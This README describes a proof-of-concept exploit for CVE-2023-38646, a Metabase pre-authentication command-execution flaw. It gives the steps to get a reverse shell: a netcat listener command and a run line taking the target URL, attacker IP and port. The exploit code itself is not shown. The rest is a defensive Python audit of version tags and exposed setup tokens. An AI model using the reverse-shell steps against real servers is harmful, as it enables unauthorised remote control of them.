Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server. I have written the script to directly gain a reverse shell on the attacker's machine.
The script requires the target URL, the attacker's IP and a port. Providing the setup token is not required for this exploit, as the script tries to obtain it from /api/session/properties.
Make sure to start a netcat listener on the attacker machine, using the following command:
nc -nlvp {Port}
Run the PoC script with:
- -u - Target URL (Metabase)
- -ip - Attacker IP
- -p - Port number
python3 CVE-2023-38646.py -u <target-url> -ip <IP> -p <PORT>
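For defenders, the two facts this README states (the fixed releases 0.46.6.1 / 1.46.6.1, and the setup token being readable from /api/session/properties) are enough to audit an instance. The following is an added example, not part of the PoC script or of Metabase: it parses a Metabase version tag, decides whether it is older than the fixed release for its edition, and flags a properties document that still exposes a setup token. The JSON key names (`version` -> `tag`, `setup-token`) and the sample documents are assumptions constructed for the example.

```python
"""Added example (not the PoC's code): version and setup-token audit for
Metabase, based only on the fixed releases and endpoint named in the README.
The JSON key names used below are assumptions about the response shape."""
import re

# Fixed releases from the README: v0.46.6.1 (open source), v1.46.6.1
# (Enterprise). The leading digit is the edition; the numeric tail is shared.
FIXED_TAIL = (46, 6, 1)
EDITIONS = {0: "open source", 1: "enterprise"}

# Accepts tags such as "v0.46.6", "v1.46.6.1" or "v0.46.6-SNAPSHOT".
_TAG_RE = re.compile(r"^v?(\d+)\.(\d+(?:\.\d+)*)")


def parse_tag(tag):
    """Split a Metabase tag like 'v0.46.6.1' into (edition, numeric tail)."""
    m = _TAG_RE.match(tag.strip())
    if not m:
        raise ValueError(f"unrecognised Metabase version tag: {tag!r}")
    edition = int(m.group(1))
    tail = tuple(int(part) for part in m.group(2).split("."))
    return edition, tail


def is_vulnerable_version(tag):
    """True when the tag is older than the fixed release for its edition.

    Tuple comparison makes 'v0.46.6' (46, 6) sort below (46, 6, 1), which is
    exactly the relationship between the last affected and the fixed build."""
    edition, tail = parse_tag(tag)
    if edition not in EDITIONS:
        raise ValueError(f"unknown Metabase edition digit {edition} in {tag!r}")
    return tail < FIXED_TAIL


def audit_properties(props):
    """Return a list of findings for a parsed /api/session/properties document.

    Key names are assumptions: 'version' -> 'tag' for the build and
    'setup-token' for the token the README says the script reads."""
    findings = []
    tag = props.get("version", {}).get("tag")
    if tag is None:
        findings.append("version tag missing from properties response")
    elif is_vulnerable_version(tag):
        edition, _ = parse_tag(tag)
        findings.append(f"{tag} ({EDITIONS[edition]}) is below the fixed release")
    # A non-empty token in an unauthenticated response is the precondition
    # the README relies on; a patched instance should not hand it out.
    if props.get("setup-token"):
        findings.append("setup-token is exposed to unauthenticated clients")
    return findings


# Constructed sample documents (not captured from a real instance).
SAMPLE_UNPATCHED = {
    "version": {"tag": "v0.46.6"},
    "setup-token": "00000000-0000-0000-0000-000000000000",  # placeholder value
}
SAMPLE_PATCHED = {
    "version": {"tag": "v0.46.6.1"},
    "setup-token": None,
}

if __name__ == "__main__":
    for name, doc in (("unpatched", SAMPLE_UNPATCHED), ("patched", SAMPLE_PATCHED)):
        print(name, audit_properties(doc) or ["no findings"])
```

In practice you would feed `audit_properties` the JSON body fetched from your own instance's /api/session/properties; an empty findings list means the build is at or above the fixed release and no token is being served.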